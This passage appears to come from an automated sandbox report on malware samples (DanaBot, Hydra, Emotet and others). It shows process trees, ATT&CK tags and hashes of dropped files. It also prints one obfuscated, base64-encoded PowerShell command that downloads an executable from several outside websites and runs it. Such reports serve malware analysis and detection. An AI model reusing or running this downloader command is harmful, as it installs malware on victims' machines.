  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:1
  2⤵
  PID:408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7532 /prefetch:1
  2⤵
  PID:5888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
  2⤵
  PID:5844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
  2⤵
  PID:5808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7516 /prefetch:1
  2⤵
  PID:2376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7356 /prefetch:1
  2⤵
  PID:1520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6564 /prefetch:1
  2⤵
  PID:1920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
  2⤵
  PID:6084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6540 /prefetch:1
  2⤵
  PID:2600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
  2⤵
  PID:3840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7036 /prefetch:1
  2⤵
  PID:688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7640 /prefetch:1
  2⤵
  PID:4668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7648 /prefetch:1
  2⤵
  PID:636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6368 /prefetch:1
  2⤵
  PID:6116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:1
  2⤵
  PID:5128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5152 /prefetch:8
  2⤵
  PID:1312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6864 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1152
- C:\Users\Admin\Downloads\DanaBot.exe
  "C:\Users\Admin\Downloads\DanaBot.exe"
  2⤵
  - Executes dropped EXE
  PID:5780
- - C:\Windows\SysWOW64\regsvr32.exe
    C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\DOWNLO~1\DanaBot.dll f1 C:\Users\Admin\DOWNLO~1\DanaBot.exe@5780
    3⤵
    - Loads dropped DLL
    PID:1276
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\DOWNLO~1\DanaBot.dll,f0
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      PID:5972
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 460
    3⤵
    - Program crash
    PID:5872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7908 /prefetch:1
  2⤵
  PID:2840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7520 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3412 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7832 /prefetch:1
  2⤵
  PID:3636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5500 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4564 /prefetch:1
  2⤵
  PID:2232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7948 /prefetch:8
  2⤵
  PID:5132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7680 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5372
- C:\Users\Admin\Downloads\Hydra.exe
  "C:\Users\Admin\Downloads\Hydra.exe"
  2⤵
  - Executes dropped EXE
  PID:3200
- C:\Users\Admin\Downloads\Hydra.exe
  "C:\Users\Admin\Downloads\Hydra.exe"
  2⤵
  - Executes dropped EXE
  PID:2304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7036 /prefetch:1
  2⤵
  PID:5536
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7344 /prefetch:8
  2⤵
  PID:1416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8004 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1380
- C:\Users\Admin\Downloads\Flasher.exe
  "C:\Users\Admin\Downloads\Flasher.exe"
  2⤵
  - Executes dropped EXE
  PID:6104
- C:\Users\Admin\Downloads\Flasher.exe
  "C:\Users\Admin\Downloads\Flasher.exe"
  2⤵
  - Executes dropped EXE
  PID:5084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7588 /prefetch:1
  2⤵
  PID:3664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7248 /prefetch:8
  2⤵
  PID:1788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2220,7418514184765474483,14492829914246705028,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6464 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4388
- C:\Users\Admin\Downloads\Melting.exe
  "C:\Users\Admin\Downloads\Melting.exe"
  2⤵
  - Executes dropped EXE
  PID:3248

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4076

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3904

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x308 0x46c
1⤵
PID:5004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5780 -ip 5780
1⤵
PID:5108

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5696

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_Emotet (1).zip\[email protected]" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4888
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:4860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2360

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\284.exe

Filesize
149KB

MD5
dfb2b4e47b6589b121f13d056208f992

SHA1
f6480ba7e7763615e1fa0b3d8289f22df55d82ec

SHA256
9a3dac72ba3b6afc88e307bd9bae52ae2016bf292ead636ec7b34923e27c8ae5

SHA512
c0b41c9d9bf7c42de17d1784de7b996db8597418cbe42417f706fbd09df3e7d057899cea2d0f737ce74447b04dd76ed70b2aa5d02491168595f64bfeb2393e08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
db9081c34e133c32d02f593df88f047a

SHA1
a0da007c14fd0591091924edc44bee90456700c6

SHA256
c9cd202ebb55fe8dd3e5563948bab458e947d7ba33bc0f38c6b37ce5d0bd7c3e

SHA512
12f9809958b024571891fae646208a76f3823ae333716a5cec303e15c38281db042b7acf95bc6523b6328ac9c8644794d39a0e03d9db196f156a6ee1fb4f2744

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3a09f853479af373691d131247040276

SHA1
1b6f098e04da87e9cf2d3284943ec2144f36ac04

SHA256
a358de2c0eba30c70a56022c44a3775aa99ffa819cd7f42f7c45ac358b5e739f

SHA512
341cf0f363621ee02525cd398ae0d462319c6a80e05fd25d9aca44234c42a3071b51991d4cf102ac9d89561a1567cbe76dfeaad786a304bec33821ca77080016

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\969fe12f-cdfa-47e3-9209-f1faef68b394.tmp

Filesize
10KB

MD5
3ef2d1ccd691a8cce8d8adc56f834c40

SHA1
8fe34b179feab8f6594e1f970844ad66c29b0f98

SHA256
1483f60812eee2a09d67aae09a012122b0ab44bba8301e64bb0a155bf5bf4731

SHA512
f66548c37bf4da6b00f8a2a1922b976c227c86dbda4def056406cb36c47984984a9909e22a496cc0d5d4d9ab6d8fc59b11260c8222a6230ffe607c6a9ff74e83

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

Filesize
64KB

MD5
d6b36c7d4b06f140f860ddc91a4c659c

SHA1
ccf16571637b8d3e4c9423688c5bd06167bfb9e9

SHA256
34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92

SHA512
2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

Filesize
69KB

MD5
7d5e1b1b9e9321b9e89504f2c2153b10

SHA1
37847cc4c1d46d16265e0e4659e6b5611d62b935

SHA256
adbd44258f3952a53d9c99303e034d87c5c4f66c5c431910b1823bb3dd0326af

SHA512
6f3dc2c523127a58def4364a56c3daa0b2d532891d06f6432ad89b740ee87eacacfcea6fa62a6785e6b9844d404baee4ea4a73606841769ab2dfc5f0efe40989

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

Filesize
41KB

MD5
ddb8bf0444969fde4ffd0dd3036d9dda

SHA1
b77ba856c51a72a40f69637a9c7980cbbe859897

SHA256
3e634c7e24539826f9f228decb932e1b9c3139c6505bbf6a9d15cc206f1cc6c3

SHA512
bca01e2dbf2b8aed3a08ddd51d68029296175b7a2f2a601a3c3e522ccfbce6c397b3c9a109db07abb053cd812865d930b097888ea58a772a99d4a67821d02f5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

Filesize
19KB

MD5
2e86a72f4e82614cd4842950d2e0a716

SHA1
d7b4ee0c9af735d098bff474632fc2c0113e0b9c

SHA256
c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f

SHA512
7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f

Filesize
65KB

MD5
56d57bc655526551f217536f19195495

SHA1
28b430886d1220855a805d78dc5d6414aeee6995

SHA256
f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

SHA512
7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

Filesize
88KB

MD5
b38fbbd0b5c8e8b4452b33d6f85df7dc

SHA1
386ba241790252df01a6a028b3238de2f995a559

SHA256
b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd

SHA512
546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011

Filesize
1.2MB

MD5
e9260f3d081cf9a5d5c7551fbdc3d234

SHA1
0cc5b721c02dab3301207880871fc97e004c3b88

SHA256
81b05795af8af16e41a86d022730747b7b59a8e96951ec3053f34f91d66cae4e

SHA512
d4445200865a3636e814fcddd9ea21dfdbed943deb68a12279d715879693921e94ca8dd8570853bbed657f47cc8d034f931f500b3591a2001185d9be45bd109a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014

Filesize
32KB

MD5
2448f641fbbbdd88f0606efa966b052e

SHA1
25825aef444654fdc036bb425f79fd1c6fc6916e

SHA256
03f060bf37ba360360d6a7413d98e485e7d8e6f69e6a1de300c788d439b78d02

SHA512
d56e3b19d3f4c6d6663117000b99071cc453b6fd93f708bb8cb92d5adfa0eaab749d8d6cef4f19fbba548d31edaecfd0a74ca55dbca7d5f5f1fe66879b27b9d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016

Filesize
74KB

MD5
b07f576446fc2d6b9923828d656cadff

SHA1
35b2a39b66c3de60e7ec273bdf5e71a7c1f4b103

SHA256
d261915939a3b9c6e9b877d3a71a3783ed5504d3492ef3f64e0cb508fee59496

SHA512
7358cbb9ddd472a97240bd43e9cc4f659ff0f24bf7c2b39c608f8d4832da001a95e21764160c8c66efd107c55ff1666a48ecc1ad4a0d72f995c0301325e1b1df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000044

Filesize
18KB

MD5
c40e8c1a469d54cbddd0d0bdf99e85a9

SHA1
865f9b718371ccdfdb0b8cc5b596519b00ab6fda

SHA256
89da13074c23d5819199ea687f62e597c3444dda8047035fb81aba8988cde88b

SHA512
45a9afe00cb1dea2741b120800b860e07815b7aa94df24865db86c4a2d6c3f057a9850c09e9bdb27ae9aee573c8f2d1f99d93b03fc84d0df21d8198ebd68bf3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000075

Filesize
19KB

MD5
3811a84079fd710635626275664e51a1

SHA1
f998ea367562d553bbb389332cd28d397750edce

SHA256
6d368394fca86cfe6157ed13d36a107a1597000921459413882544a9d72ade3b

SHA512
75c6746b24ea432e3f5883b6ed87076ad4c4e25c3322e58449d5e2268ce0df9497245561e480d59d916b8e84d79ac148c7cada8a3ed1714bb74aa701bb0b3295

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000089

Filesize
145KB

MD5
27e0b0d117c9b50b2dd782e77926c41a

SHA1
f6b69d3570bca5026ce8fd3670224d4f10a5d833

SHA256
f7fa3985fcc91607f1afd125a17333779a8c3e2fbae3a243b1238bba4c63548d

SHA512
632371a460db88e640f90e543bc83b3163ca3d23c474b5ebd6ede20949869886727129538d213a33549d70cafec5ff64256c743f7f87bb140ccc19da03eec002

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000b5

Filesize
62KB

MD5
1721006aa7e52dafddd68998f1ca9ac0

SHA1
884e3081a1227cd1ed4ec63fb0a98bec572165ba

SHA256
c16e012546b3d1ef206a1ecbbb7bf8b5dfd0c13cfeb3bdc8af8c11eaa9da8b84

SHA512
ff7bfd489dc8c5001eea8f823e5ec7abf134e8ad52ee9544a8f4c20800cb67a724ec157ca8f4c434a94262a8e07c3452b6ad994510b2b9118c78e2f53d75a493

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000cb

Filesize
18KB

MD5
175e5199991c7be0f58a8a0e8b124699

SHA1
5eea8d728c98f987c4127f0b84c055ee0bf075c6

SHA256
451516c415447c3540d1787651472ad7d44d67a5a367b58afa349dbfa9f39149

SHA512
638e616862b73023c0bb00bdeea88968f63c99ce8c03fb2858d624282626e6063f6b789b3d5aed393f4ec2ed7f55643f8b87e285f659480f0cc806466169bbda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_0000dd

Filesize
102KB

MD5
510f114800418d6b7bc60eebd1631730

SHA1
acb5bc4b83a7d383c161917d2de137fd6358aabd

SHA256
f62125428644746f081ca587ffa9449513dd786d793e83003c1f9607ca741c89

SHA512
6fe51c58a110599ea5d7f92b4b17bc2746876b4b5b504e73d339776f9dfa1c9154338d6793e8bf75b18f31eb677afd3e0c1bd33e40ac58e8520acbb39245af1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\0557cb3b754e8a40_0

Filesize
53KB

MD5
